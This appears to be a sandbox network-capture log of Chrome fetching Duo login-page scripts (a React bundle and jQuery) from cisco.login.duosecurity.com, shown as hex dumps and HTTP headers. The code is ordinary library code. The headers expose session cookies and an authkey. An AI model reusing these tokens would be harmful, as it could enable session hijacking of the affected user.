                                                                                                                                          2024-11-18 05:48:16 UTC8214INData Raw: 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 6d 28 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 28 74 68 69 73 29 2e 77 72 61 70 41 6c 6c 28 6e 3f 74 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 3a 74 29 7d 29 7d 2c 75 6e 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 65 6e 74 28 65 29 2e 6e 6f 74 28 22 62 6f 64 79 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 53 28 74 68 69 73 29 2e 72 65 70 6c 61 63 65 57 69 74 68 28 74 68 69 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7d 29 2c 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e
                                                                                                                                          Data Ascii: wrap:function(t){var n=m(t);return this.each(function(e){S(this).wrapAll(n?t.call(this,e):t)})},unwrap:function(e){return this.parent(e).not("body").each(function(){S(this).replaceWith(this.childNodes)}),this}}),S.expr.pseudos.hidden=function(e){return!S.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          66192.168.2.165520135.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:16 UTC1055OUTGET /static/js/page/email-first.js?v=488d0 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:16 UTC629INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:16 GMT
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          Content-Length: 1031501
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-fbd4d"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:16 UTC15755INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 65 6d 61 69 6c 2d 66 69 72 73 74 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6c 65 61 66 50 72 6f 74 6f 74 79 70 65 73 2c 67 65 74 50 72 6f 74 6f 2c 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 38 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 5f 5f 75 6e 75 73 65 64 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 2c 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 39 31 32 39 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f
                                                                                                                                          Data Ascii: /*! For license information please see email-first.js.LICENSE.txt */!function(){var leafPrototypes,getProto,__webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__
                                                                                                                                          2024-11-18 05:48:16 UTC16378INData Raw: 28 61 29 7b 70 62 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 62 3d 62 2b 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 61 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2c 6f 62 5b 62 5d 3d 6f 62 5b 61 5d 7d 29 29 7d 29 29 3b 76 61 72 20 73 62 3d 41 28 7b 6d 65 6e 75 69 74 65 6d 3a 21 30 7d 2c 7b 61 72 65 61 3a 21 30 2c 62 61 73 65 3a 21 30 2c 62 72 3a 21 30 2c 63 6f 6c 3a 21 30 2c 65 6d 62 65 64 3a 21 30 2c 68 72 3a 21 30 2c 69 6d 67 3a 21 30 2c 69 6e 70 75 74 3a 21 30 2c 6b 65 79 67 65 6e 3a 21 30 2c 6c 69 6e 6b 3a 21 30 2c 6d 65 74 61 3a 21 30 2c 70 61 72 61 6d 3a 21 30 2c 73 6f 75 72 63 65 3a 21 30 2c 74 72 61 63 6b 3a 21 30 2c 77 62 72 3a 21 30 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 74 62 28 61 2c 62 29 7b
                                                                                                                                          Data Ascii: (a){pb.forEach((function(b){b=b+a.charAt(0).toUpperCase()+a.substring(1),ob[b]=ob[a]}))}));var sb=A({menuitem:!0},{area:!0,base:!0,br:!0,col:!0,embed:!0,hr:!0,img:!0,input:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0});function tb(a,b){
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 61 29 7b 69 66 28 22 73 65 6c 65 63 74 69 6f 6e 63 68 61 6e 67 65 22 3d 3d 3d 61 7c 7c 22 6b 65 79 75 70 22 3d 3d 3d 61 7c 7c 22 6b 65 79 64 6f 77 6e 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 70 65 29 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 61 2c 62 29 7b 69 66 28 22 63 6c 69 63 6b 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 61 2c 62 29 7b 69 66 28 22 69 6e 70 75 74 22 3d 3d 3d 61 7c 7c 22 63 68 61 6e 67 65 22 3d 3d 3d 61 29 72 65 74 75 72 6e 20 73 65 28 62 29 7d 76 61 72 20 47 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 69 73 3f 4f 62 6a 65 63 74 2e 69 73 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 30 21 3d 3d 61 7c
                                                                                                                                          Data Ascii: a){if("selectionchange"===a||"keyup"===a||"keydown"===a)return se(pe)}function De(a,b){if("click"===a)return se(b)}function Ee(a,b){if("input"===a||"change"===a)return se(b)}var Ge="function"==typeof Object.is?Object.is:function(a,b){return a===b&&(0!==a|
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 72 67 28 61 2c 62 2c 63 29 7b 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 61 3b 29 7b 76 61 72 20 64 3d 61 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 3f 28 61 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 2c 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 29 3a 6e 75 6c 6c 21 3d 3d 64 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 26 62 29 21 3d 3d 62 26 26 28 64 2e 63 68 69 6c 64 4c 61 6e 65 73 7c 3d 62 29 2c 61 3d 3d 3d 63 29 62 72 65 61 6b 3b 61 3d 61 5b 22 72 65 74 75 72 6e 22 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 67 28 61 2c 62 29 7b 6d 67 3d 61 2c 6f 67 3d 6e 67 3d 6e 75 6c 6c 2c 6e 75 6c 6c 21 3d 3d 28 61 3d 61 2e 64 65 70 65 6e 64 65 6e 63
                                                                                                                                          Data Ascii: }function rg(a,b,c){for(;null!==a;){var d=a.alternate;if((a.childLanes&b)!==b?(a.childLanes|=b,null!==d&&(d.childLanes|=b)):null!==d&&(d.childLanes&b)!==b&&(d.childLanes|=b),a===c)break;a=a["return"]}}function sg(a,b){mg=a,og=ng=null,null!==(a=a.dependenc
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 7d 64 2e 62 61 73 65 51 75 65 75 65 3d 65 3d 66 2c 63 2e 70 65 6e 64 69 6e 67 3d 6e 75 6c 6c 7d 69 66 28 6e 75 6c 6c 21 3d 3d 65 29 7b 66 3d 65 2e 6e 65 78 74 2c 64 3d 64 2e 62 61 73 65 53 74 61 74 65 3b 76 61 72 20 68 3d 67 3d 6e 75 6c 6c 2c 6b 3d 6e 75 6c 6c 2c 6c 3d 66 3b 64 6f 7b 76 61 72 20 6e 3d 6c 2e 6c 61 6e 65 3b 69 66 28 28 4f 68 26 6e 29 3d 3d 3d 6e 29 6e 75 6c 6c 21 3d 3d 6b 26 26 28 6b 3d 6b 2e 6e 65 78 74 3d 7b 6c 61 6e 65 3a 30 2c 61 63 74 69 6f 6e 3a 6c 2e 61 63 74 69 6f 6e 2c 68 61 73 45 61 67 65 72 53 74 61 74 65 3a 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 2c 65 61 67 65 72 53 74 61 74 65 3a 6c 2e 65 61 67 65 72 53 74 61 74 65 2c 6e 65 78 74 3a 6e 75 6c 6c 7d 29 2c 64 3d 6c 2e 68 61 73 45 61 67 65 72 53 74 61 74 65 3f 6c 2e 65 61 67
                                                                                                                                          Data Ascii: }d.baseQueue=e=f,c.pending=null}if(null!==e){f=e.next,d=d.baseState;var h=g=null,k=null,l=f;do{var n=l.lane;if((Oh&n)===n)null!==k&&(k=k.next={lane:0,action:l.action,hasEagerState:l.hasEagerState,eagerState:l.eagerState,next:null}),d=l.hasEagerState?l.eag
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 29 3b 65 6c 73 65 20 69 66 28 34 21 3d 3d 63 2e 74 61 67 26 26 6e 75 6c 6c 21 3d 3d 63 2e 63 68 69 6c 64 29 7b 63 2e 63 68 69 6c 64 5b 22 72 65 74 75 72 6e 22 5d 3d 63 2c 63 3d 63 2e 63 68 69 6c 64 3b 63 6f 6e 74 69 6e 75 65 7d 69 66 28 63 3d 3d 3d 62 29 62 72 65 61 6b 3b 66 6f 72 28 3b 6e 75 6c 6c 3d 3d 3d 63 2e 73 69 62 6c 69 6e 67 3b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7c 7c 63 5b 22 72 65 74 75 72 6e 22 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 3b 63 3d 63 5b 22 72 65 74 75 72 6e 22 5d 7d 63 2e 73 69 62 6c 69 6e 67 5b 22 72 65 74 75 72 6e 22 5d 3d 63 5b 22 72 65 74 75 72 6e 22 5d 2c 63 3d 63 2e 73 69 62 6c 69 6e 67 7d 7d 2c 55 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 56 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c
                                                                                                                                          Data Ascii: );else if(4!==c.tag&&null!==c.child){c.child["return"]=c,c=c.child;continue}if(c===b)break;for(;null===c.sibling;){if(null===c["return"]||c["return"]===b)return;c=c["return"]}c.sibling["return"]=c["return"],c=c.sibling}},Ui=function(){},Vi=function(a,b,c,
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 7b 4e 6a 28 33 2c 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 29 2c 4f 6a 28 33 2c 61 29 7d 63 61 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 74 72 79 7b 4e 6a 28 35 2c 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 29 7d 63 61 74 63 68 28 6d 29 7b 55 28 61 2c 61 5b 22 72 65 74 75 72 6e 22 5d 2c 6d 29 7d 7d 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 69 66 28 61 6b 28 62 2c 61 29 2c 63 6b 28 61 29 2c 35 31 32 26 64 26 26 6e 75 6c 6c 21 3d 3d 63 26 26 4a 6a 28 63 2c 63 5b 22 72 65 74 75 72 6e 22 5d 29 2c 33 32 26 61 2e 66 6c 61 67 73 29 7b 76 61 72 20 65 3d
                                                                                                                                          Data Ascii: {Nj(3,a,a["return"]),Oj(3,a)}catch(m){U(a,a["return"],m)}try{Nj(5,a,a["return"])}catch(m){U(a,a["return"],m)}}break;case 1:ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]);break;case 5:if(ak(b,a),ck(a),512&d&&null!==c&&Jj(c,c["return"]),32&a.flags){var e=
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 3d 71 29 7b 71 5b 22 72 65 74 75 72 6e 22 5d 3d 79 2c 54 3d 71 3b 62 72 65 61 6b 7d 54 3d 79 7d 7d 7d 76 61 72 20 6d 3d 66 2e 61 6c 74 65 72 6e 61 74 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6d 29 7b 76 61 72 20 77 3d 6d 2e 63 68 69 6c 64 3b 69 66 28 6e 75 6c 6c 21 3d 3d 77 29 7b 6d 2e 63 68 69 6c 64 3d 6e 75 6c 6c 3b 64 6f 7b 76 61 72 20 4a 3d 77 2e 73 69 62 6c 69 6e 67 3b 77 2e 73 69 62 6c 69 6e 67 3d 6e 75 6c 6c 2c 77 3d 4a 7d 77 68 69 6c 65 28 6e 75 6c 6c 21 3d 3d 77 29 7d 7d 54 3d 66 7d 7d 69 66 28 30 21 3d 28 32 30 36 34 26 66 2e 73 75 62 74 72 65 65 46 6c 61 67 73 29 26 26 6e 75 6c 6c 21 3d 3d 67 29 67 5b 22 72 65 74 75 72 6e 22 5d 3d 66 2c 54 3d 67 3b 65 6c 73 65 20 62 3a 66 6f 72 28 3b 6e 75 6c 6c 21 3d 3d 54 3b 29 7b 69 66 28 30 21 3d 28 32 30 34 38
                                                                                                                                          Data Ascii: =q){q["return"]=y,T=q;break}T=y}}}var m=f.alternate;if(null!==m){var w=m.child;if(null!==w){m.child=null;do{var J=w.sibling;w.sibling=null,w=J}while(null!==w)}}T=f}}if(0!=(2064&f.subtreeFlags)&&null!==g)g["return"]=f,T=g;else b:for(;null!==T;){if(0!=(2048
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 65 62 70 61 63 6b 5f 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 44 43 45 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 29 74 72 79 7b 5f 5f 52 45 41 43 54 5f 44 45 56 54 4f 4f 4c 53 5f 47 4c 4f 42 41 4c 5f 48 4f 4f 4b 5f 5f 2e 63 68 65 63 6b 44 43 45 28 63 68 65 63 6b 44 43 45 29 7d 63 61 74 63 68 28 65 72 72 29 7b 63 6f 6e 73 6f 6c
                                                                                                                                          Data Ascii: ebpack_exports,__webpack_require__){"use strict";!function checkDCE(){if("undefined"!=typeof __REACT_DEVTOOLS_GLOBAL_HOOK__&&"function"==typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE)try{__REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE)}catch(err){consol
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 69 6d 65 73 22 2c 22 e2 a5 b6 22 3a 22 6c 74 6c 61 72 72 22 2c 22 e2 a9 bb 22 3a 22 6c 74 71 75 65 73 74 22 2c 22 e2 97 83 22 3a 22 6c 74 72 69 22 2c 22 e2 a6 96 22 3a 22 6c 74 72 50 61 72 22 2c 22 e2 a5 8a 22 3a 22 6c 75 72 64 73 68 61 72 22 2c 22 e2 a5 a6 22 3a 22 6c 75 72 75 68 61 72 22 2c 22 e2 89 a8 ef b8 80 22 3a 22 6c 76 6e 45 22 2c 22 c2 af 22 3a 22 6d 61 63 72 22 2c 22 e2 99 82 22 3a 22 6d 61 6c 65 22 2c 22 e2 9c a0 22 3a 22 6d 61 6c 74 22 2c 22 e2 a4 85 22 3a 22 4d 61 70 22 2c 22 e2 86 a6 22 3a 22 6d 61 70 22 2c 22 e2 86 a5 22 3a 22 6d 61 70 73 74 6f 75 70 22 2c 22 e2 96 ae 22 3a 22 6d 61 72 6b 65 72 22 2c 22 e2 a8 a9 22 3a 22 6d 63 6f 6d 6d 61 22 2c 22 d0 9c 22 3a 22 4d 63 79 22 2c 22 d0 bc 22 3a 22 6d 63 79 22 2c 22 e2 80 94 22 3a 22 6d 64 61
                                                                                                                                          Data Ascii: imes","":"ltlarr","":"ltquest","":"ltri","":"ltrPar","":"lurdshar","":"luruhar","":"lvnE","":"macr","":"male","":"malt","":"Map","":"map","":"mapstoup","":"marker","":"mcomma","":"Mcy","":"mcy","":"mda


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          67192.168.2.165520552.223.1.1634436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:17 UTC757OUTGET /static/shared/lib/jquery/jquery.min.js?v=ff152 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:17 UTC627INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:17 GMT
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          Content-Length: 89501
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-15d9d"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:17 UTC15757INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                          2024-11-18 05:48:17 UTC16378INData Raw: 7b 76 61 72 20 79 3d 22 6e 74 68 22 21 3d 3d 68 2e 73 6c 69 63 65 28 30 2c 33 29 2c 6d 3d 22 6c 61 73 74 22 21 3d 3d 68 2e 73 6c 69 63 65 28 2d 34 29 2c 78 3d 22 6f 66 2d 74 79 70 65 22 3d 3d 3d 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 67 26 26 30 3d 3d 3d 76 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28
                                                                                                                                          Data Ascii: {var y="nth"!==h.slice(0,3),m="last"!==h.slice(-4),x="of-type"===e;return 1===g&&0===v?function(e){return!!e.parentNode}:function(e,t,n){var r,i,o,a,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53 5d 29 7d 7d 29 2c 53 2e 72 65 61 64 79 2e 74 68 65 6e 3d 46 2e 74 68 65 6e 2c 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 45 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 53 2e 72 65 61 64 79 29 3a 28 45 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 42 29 2c 43 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d
                                                                                                                                          Data Ascii: solveWith(E,[S])}}),S.ready.then=F.then,"complete"===E.readyState||"loading"!==E.readyState&&!E.documentElement.doScroll?C.setTimeout(S.ready):(E.addEventListener("DOMContentLoaded",B),C.addEventListener("load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=
                                                                                                                                          2024-11-18 05:48:17 UTC16384INData Raw: 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 53 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 63 6c 65 61 6e 44 61 74 61 28 76 65 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 6e 26 26 69 65 28 72 29 26 26 79 65 28 76 65 28 72 2c 22 73 63 72 69 70 74 22 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 72 29 29 3b 72 65 74 75 72 6e 20 65 7d 53 2e 65 78 74 65 6e 64 28 7b 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69
                                                                                                                                          Data Ascii: e,t,n){for(var r,i=t?S.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||S.cleanData(ve(r)),r.parentNode&&(n&&ie(r)&&ye(ve(r,"script")),r.parentNode.removeChild(r));return e}S.extend({htmlPrefilter:function(e){return e},clone:function(e,t,n){var r,i
